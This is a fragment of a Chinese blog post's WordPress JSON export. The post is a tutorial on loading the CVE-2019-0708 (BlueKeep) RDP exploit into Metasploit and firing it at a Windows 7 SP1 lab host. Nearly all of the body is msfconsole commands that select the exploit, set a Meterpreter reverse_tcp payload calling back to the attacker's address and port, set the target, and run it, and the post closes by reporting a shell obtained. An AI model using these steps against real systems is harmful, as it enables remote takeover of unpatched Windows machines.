![\"CVE](\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" "\\"CVE")
\nmsf5 > search cve-2019-0708 \/\/\u641c\u7d22cve-2019-0708<\/p>\n
\u628aCVE-2019-0708\u7684\u653b\u51fb\u5957\u4ef6\u6dfb\u52a0\u5230metasploit\u4e2d
\n\u6dfb\u52a0\u6559\u7a0b<\/p>\n
\u653b\u51fb\u4e3b\u673a:192.168.10.128 \u76ee\u6807\u4e3b\u673a:192.168.10.131 (win7 SP1)
\n\u6253\u5f00msf,\u8f93\u5165reload_all\u547d\u4ee4<\/p>\n
msf5 > reload_all \/\/\u52a0\u8f7d\u811a\u672c
\nmsf5 > search cve-2019-0708 \/\/\u641c\u7d22cve-2019-0708<\/p>\n
<\/p>\n
#\u4f7f\u7528\u811a\u672c
\nmsf5 > use exploit\/windows\/rdp\/cve_2019_0708_bluekeep_rce
\n#\u8bbe\u7f6e\u76d1\u542c\u53cd\u5f39payload
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > set payload windows\/x64\/meterpreter\/reverse_tcp
\n#\u8bbe\u7f6e\u76d1\u542c\u5730\u5740
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > set lhost 192.168.10.128
\n#\u8bbe\u7f6e\u76d1\u542c\u7aef\u53e3
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > set lport 4444<\/p>\n
#\u8bbe\u7f6e\u76ee\u6807ip
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > set rdp_client_ip 192.168.10.131
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.10.131
\n#\u53d6\u6d88\u9ed8\u8ba4\u8bbe\u7f6e\u7684\u540d\u79f0
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > unset RDP_CLIENT_NAME
\n#\u8bbe\u7f6e\u76ee\u6807\u7c7b\u578b\uff0c\u63d0\u9ad8\u6210\u529f\u7387
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > set target 3
\n#\u67e5\u770b\u653b\u51fb\u811a\u672c\u8981\u8bbe\u7f6e\u7684\u53c2\u6570
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > show options<\/p>\n
<\/p>\n
#\u5f00\u542f\u653b\u51fb
\nmsf5 exploit(windows\/rdp\/cve_2019_0708_bluekeep_rce) > run
\n
\n\u6210\u529f\u83b7\u53d6\u5230shell<\/p>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u628aCVE-2019-0708\u7684\u653b\u51fb\u5957\u4ef6\u6dfb\u52a0\u5230metasploit\u4e2d \u6dfb\u52a0\u6559\u7a0b \u653b\u51fb\u4e3b\u673a:192.168.10. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[503,533],"class_list":["post-996","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-cve-2019-0708","tag-windwos"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/996","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=996"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/996\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=996"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=996"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=996"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}